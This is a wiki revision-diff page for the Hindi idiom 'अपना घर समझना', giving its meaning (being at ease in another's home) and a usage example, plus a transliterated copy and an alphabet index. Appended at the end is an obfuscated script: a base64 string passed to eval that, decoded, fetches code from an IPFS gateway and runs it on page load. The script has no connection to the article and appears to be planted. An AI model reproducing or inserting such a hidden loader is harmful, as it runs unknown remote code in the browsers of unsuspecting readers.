Difference between revisions of "अपना घर समझना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
'''अपना घर समझना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है ।
 
'''अपना घर समझना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है ।
  
'''अर्थ''' -अपने घर की तरह दुसरे के घर में रहना अर्थात दूसरे के घर में किसी प्रकार की औपचारिकता न बरतना।
+
'''अर्थ''' -अपने घर की तरह दुसरे के घर में रहना अर्थात् दूसरे के घर में किसी प्रकार की औपचारिकता न बरतना।
  
 
'''प्रयोग''' -मैंने तो सदा इस घर को अपना ही घर समझा है। भले ही आपने मुझे अपना समझा हो या न। (किरणबाला)
 
'''प्रयोग''' -मैंने तो सदा इस घर को अपना ही घर समझा है। भले ही आपने मुझे अपना समझा हो या न। (किरणबाला)
Line 9: Line 9:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
 
[[Category:हिन्दी मुहावरे एवं लोकोक्ति कोश]]
 
[[Category:हिन्दी मुहावरे एवं लोकोक्ति कोश]]
 
[[Category:कहावत लोकोक्ति मुहावरे]]
 
[[Category:कहावत लोकोक्ति मुहावरे]]
 
[[Category:साहित्य कोश]]
 
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:10, 20 April 2018

apana ghar samajhana ek prachalit lokokti athava hindi muhavara hai .

arth -apane ghar ki tarah dusare ke ghar mean rahana arthath doosare ke ghar mean kisi prakar ki aupacharikata n baratana.

prayog -maianne to sada is ghar ko apana hi ghar samajha hai. bhale hi apane mujhe apana samajha ho ya n. (kiranabala)


tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>